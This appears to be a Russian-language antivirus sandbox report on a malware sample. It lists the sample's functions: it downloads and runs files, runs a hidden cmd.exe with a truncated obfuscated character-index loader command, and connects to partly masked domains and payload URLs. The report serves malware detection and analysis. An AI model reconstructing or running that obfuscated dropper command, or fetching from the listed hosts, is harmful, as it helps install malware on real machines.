Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"set h7=TrWpZHkGilrpENjqKwWB)\C5g}t;I$P+mcO{xJA1'8Y0 6e@-RLfU:yoD(svnFu.,zabS7V429=\dh&&for %M in (29;37;49;14;74;40;58;12;12;40;27;29;0;17;38;74;60...
Сетевая активность
Подключается к
- 'ex####ivetvlnet.com':80
- 'ex####ivetvlnet.com':443
- 'ra###igupta.com':80
- 'hu###omains.com':443
TCP
Запросы HTTP GET
- http://www.ex####ivetvlnet.com/eb1o4
- http://ra###igupta.com/eU6
Другие
- 'ex####ivetvlnet.com':443
- 'hu###omains.com':443
UDP
- DNS ASK ex####ivetvlnet.com
- DNS ASK ra###igupta.com
- DNS ASK hu###omains.com
- DNS ASK de###connor.com
- DNS ASK wh######tifiedangusbeef.com
- DNS ASK ai#####icyproject.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"set h7=TrWpZHkGilrpENjqKwWB)\C5g}t;I$P+mcO{xJA1'8Y0 6e@-RLfU:yoD(svnFu.,zabS7V429=\dh&&for %M in (29;37;49;14;74;40;58;12;12;40;27;29;0;17;38;74;60...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:/C"set h7=TrWpZHkGilrpENjqKwWB)\C5g}t;I$P+mcO{xJA1'8Y0 6e@-RLfU:yoD(svnFu.,zabS7V429=/dh&&for %M in (29;37;49;14;74;40;58;12;12;40;27;29;0;17;38;74;60;46;17;48;55;67;14;46;33;26;44;13;46;26;...
